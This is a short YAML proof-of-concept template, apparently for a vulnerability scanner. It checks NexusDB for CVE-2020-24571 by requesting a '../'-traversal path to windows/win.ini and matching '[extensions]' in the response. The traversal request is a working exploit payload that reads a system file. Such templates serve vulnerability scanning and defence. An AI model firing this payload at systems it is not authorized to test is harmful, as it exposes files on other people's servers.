name: poc-yaml-nexusdb-cve-2020-24571-path-traversal rules: - method: GET path: /../../../../../../../../windows/win.ini follow_redirects: true expression: > response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") detail: author: su(https://suzzz112113.github.io/#blog) links: - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371